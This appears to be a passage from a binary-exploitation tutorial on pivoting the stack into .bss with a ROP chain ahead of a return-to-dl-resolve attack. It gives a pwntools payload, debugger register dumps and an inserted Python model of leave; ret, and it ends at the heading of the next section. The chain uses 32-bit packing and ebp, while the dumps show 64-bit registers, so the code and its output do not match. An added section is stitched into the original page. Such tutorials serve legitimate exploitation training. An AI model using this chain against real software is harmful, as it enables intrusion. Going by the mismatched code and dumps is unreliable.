Move to ".bss"
# Stage 1: pivot the stack into .bss.
# The chain calls read(0, base_stage, 100), then sets ebp = base_stage and
# runs leave; ret, so the next stage is read from stdin into .bss and
# executed from there ("jmp base_stage").
from pwn import p32  # pwntools; addr_* and base_stage are resolved from the target binary (e.g. with ELF())

buf1 = b'A' * 62              # padding up to the saved return address
buf1 += p32(addr_plt_read)    # return into read@plt
buf1 += p32(addr_pop3)        # pop; pop; pop; ret -> discards the three arguments
buf1 += p32(0)                # fd = stdin
buf1 += p32(base_stage)       # destination: writable address in .bss
buf1 += p32(100)              # number of bytes to read
buf1 += p32(addr_pop_ebp)     # pop ebp; ret
buf1 += p32(base_stage)       # ebp = base_stage
buf1 += p32(addr_leave_ret)   # leave; ret -> esp = base_stage + 4, execution continues from .bss
Registers at vuln+31, just before `leave` executes (RBP already points into .bss, RSP is still on the real stack):
RAX: 0x127 
RBX: 0x4141414141414141 ('AAAAAAAA')
RCX: 0x7fd67462e260 (<__read_nocancel+7>:	cmp    rax,0xfffffffffffff001)
RDX: 0x190 
RSI: 0x601440 ("AAAAAAAA\n\006@")
RDI: 0x0 
RBP: 0x601440 ("AAAAAAAA\n\006@")
RSP: 0x7ffdc28c1b38 --> 0x7ffdc28c1b60 --> 0x1 
RIP: 0x400585 (<vuln+31>:	leave)
R8 : 0x400620 (<__libc_csu_fini>:	repz ret)
R9 : 0x7fd674911ab0 (<_dl_fini>:	push   rbp)
R10: 0x37b 
R11: 0x246 
R12: 0x4141414141414141 ('AAAAAAAA')
R13: 0x4141414141414141 ('AAAAAAAA')
R14: 0x4141414141414141 ('AAAAAAAA')
R15: 0x4141414141414141 ('AAAAAAAA')

Registers at vuln+32, after `leave` and just before `ret` (RSP now points into .bss at the next gadget):
RAX: 0x127 
RBX: 0x4141414141414141 ('AAAAAAAA')
RCX: 0x7fd67462e260 (<__read_nocancel+7>:	cmp    rax,0xfffffffffffff001)
RDX: 0x190 
RSI: 0x601440 ("AAAAAAAA\n\006@")
RDI: 0x0 
RBP: 0x4141414141414141 ('AAAAAAAA')
RSP: 0x601448 --> 0x40060a (<__libc_csu_init+90>:	pop    rbx)
RIP: 0x400586 (<vuln+32>:	ret)
R8 : 0x400620 (<__libc_csu_fini>:	repz ret)
R9 : 0x7fd674911ab0 (<_dl_fini>:	push   rbp)
R10: 0x37b 
R11: 0x246 
R12: 0x4141414141414141 ('AAAAAAAA')
R13: 0x4141414141414141 ('AAAAAAAA')
R14: 0x4141414141414141 ('AAAAAAAA')
R15: 0x4141414141414141 ('AAAAAAAA')
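As an added example that is not part of the original page, the following Python models the `leave; ret` sequence at vuln+31/vuln+32 and reproduces the register transition shown in the two dumps: after `leave`, RSP leaves the real stack (0x7ffdc28c1b38) and lands at 0x601448, and `ret` then loads RIP from that .bss address. The memory contents at 0x601440 and 0x601448 are taken from the dump itself ("AAAAAAAA" followed by 0x40060a); the dictionary-based memory, the register names and the unmapped-address check are this example's own simplification, not a CPU emulator.

```python
# Added example (not from the original page): a minimal model of x86-64
# `leave; ret`, used to check why the register dump above moves RSP from
# the stack into .bss. Memory contents and register values come from the
# dump; the dict-based memory model is an assumption of this example.

WORD = 8
MASK = (1 << 64) - 1

# Constructed memory snapshot of the pivot target in .bss, matching the dump:
# 0x601440 holds "AAAAAAAA", 0x601448 holds the address of the next gadget.
MEMORY = {
    0x601440: 0x4141414141414141,
    0x601448: 0x40060a,
}

# Register state at vuln+31 (from the dump): RBP already points into .bss,
# RSP is still on the real stack, RIP is at the `leave` instruction.
BEFORE = {"rbp": 0x601440, "rsp": 0x7ffdc28c1b38, "rip": 0x400585}


def read_qword(mem, addr):
    """Fetch an 8-byte value; an unmapped address raises, like a fault would."""
    if addr not in mem:
        raise KeyError(f"read from unmapped address {addr:#x}")
    return mem[addr]


def leave(regs, mem):
    """leave == mov rsp, rbp ; pop rbp"""
    regs = dict(regs)
    regs["rsp"] = regs["rbp"]                       # stack pointer follows the frame pointer
    regs["rbp"] = read_qword(mem, regs["rsp"])      # pop rbp
    regs["rsp"] = (regs["rsp"] + WORD) & MASK
    return regs


def ret(regs, mem):
    """ret == pop rip"""
    regs = dict(regs)
    regs["rip"] = read_qword(mem, regs["rsp"])      # next instruction comes from the new stack
    regs["rsp"] = (regs["rsp"] + WORD) & MASK
    return regs


def simulate_pivot(regs, mem):
    """Run leave then ret; return the register states after each step."""
    after_leave = leave(regs, mem)
    after_ret = ret(after_leave, mem)
    return after_leave, after_ret


if __name__ == "__main__":
    after_leave, after_ret = simulate_pivot(BEFORE, MEMORY)
    print(f"after leave: rsp={after_leave['rsp']:#x} rbp={after_leave['rbp']:#x}")
    print(f"after ret:   rsp={after_ret['rsp']:#x} rip={after_ret['rip']:#x}")
```

Running it reproduces the second dump: RSP = 0x601448 and RBP = 0x4141414141414141 after `leave`, then RIP = 0x40060a after `ret`. The same model explains why the pivot target must be a mapped, writable region such as .bss: if RBP pointed at an unmapped address, the `pop rbp` inside `leave` would fault instead of continuing.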

Return-to-dl-resolve

  • ".bss" 영역에 다음과 같이 Data를 저장합니다.
